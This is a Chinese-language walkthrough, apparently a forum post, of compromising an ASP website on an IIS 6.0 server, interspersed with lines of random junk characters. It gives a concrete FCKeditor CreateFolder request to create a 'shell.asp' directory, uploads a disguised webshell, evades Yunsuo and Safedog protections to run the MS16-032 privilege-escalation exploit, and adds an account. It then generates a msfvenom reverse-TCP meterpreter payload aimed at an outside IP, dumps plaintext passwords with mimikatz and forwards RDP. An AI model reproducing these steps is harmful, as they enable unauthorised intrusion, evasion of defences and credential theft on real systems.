0 q8 u% z- j' p( \! K( Z
8 x. @. v+ e4 W6 a9 e u: I1 g
+ j- Y& Q3 H- g0 @% h, D $ m; { P1 f. c- [$ O! i: E
5 f8 {0 k- M! I" ]
6 G Q( }8 T# F8 w3 ] 5 ^$ v9 t) o0 g2 [7 F* Q# j4 @
一、 利用getwebshell篇
# y% w4 u9 f8 m, a5 k: M , Q* s8 D( K$ q. x8 [0 C6 w
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
+ | {) c2 o, l6 J
; S2 T0 J" o" M5 A
x. K/ B: c @ D1 |" @$ E: v2 S下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
8 d2 v* W @8 \/ ~ , i3 J( ?' E3 z% d) L0 E2 ?$ N* W
下面我们构造一个asp目录,如: 8 m& T' c* i% P. Z
! p$ O: l' n- Y( q2 U2 _
4 Q& M2 V, [! f! Q0 } http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 : x3 L9 ^/ \. P5 M' J
4 V" Y( M( a+ h" y6 }/ s
& J' v, ]6 t2 A- N& [% V 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。 7 {+ i8 t3 V' f$ \
( W3 K0 r6 G! s' w1 L9 ^" W9 o- L一、 绕过安全狗云锁提权并且加账号 % k' [" ~! f, M6 I- r9 G/ O$ v9 w
' \1 P- p/ x9 B- ^2 X$ [没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干 6 ^2 \; d) k1 u4 d# U' R: D
4 \: m) T9 E# [- T& ]如图:
; X; Z' P. ]* O6 Q5 ^# Z0 Q " r: O% P" O( r% M* k! O/ a: w
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit - j; g4 K! \/ T. l+ Z. {3 h
( y0 Z$ X1 t0 ]3 D一、 利用metasploit
" }4 E n) c! e7 G / J- o& e0 F$ K9 n5 q
首先用pentestbox生成一个64位的payload如下命令 ' E8 ]# c0 |, n
) N) j) ~; E0 h: o) r
msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe : C# C6 ~; @" x
* [; [7 a8 J2 L2 S( f
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图: ( R' y) P2 [- d$ M, I& J/ L
1 R6 T8 s0 F( a0 H
下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图: 5 {! f' `2 J% \$ S5 {" t( p2 }
! |9 q2 U( n: R2 M# k( V) T
下面我们来做一个监听如下命令: $ \6 \2 g ]* }8 Y- F) U
% k/ c- m6 H' S& g' N, T. u
portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
8 e' J) B9 F! {9 | & S& }6 C5 X s/ K. h
# ^% E9 Y. D+ Y; D/ _3 H
| M# h0 d1 c9 \+ u8 i2 i, M
; u) J6 F+ Z1 f3 @/ {" ~- W
8 @ p0 V* Y/ e8 C: j# Y, Z" y
1 P1 r6 s3 _; M6 ^# {
* d9 v: I, p2 ]+ i
! ]& [0 m" z8 n* ?
+ I r6 j5 w# @6 W1 D
1 @+ }4 b2 v y7 q' u* I( I
9 I7 n' E- U0 h: W5 S. m$ C
5 v7 @. Z: I( Z x3 k/ @
6 j$ {+ y7 ~! _" S
; K3 d9 Q6 p: e" S& `0 {8 Z: E5 j# q
& Y. z; P; ?+ q8 @. J, X8 o$ z |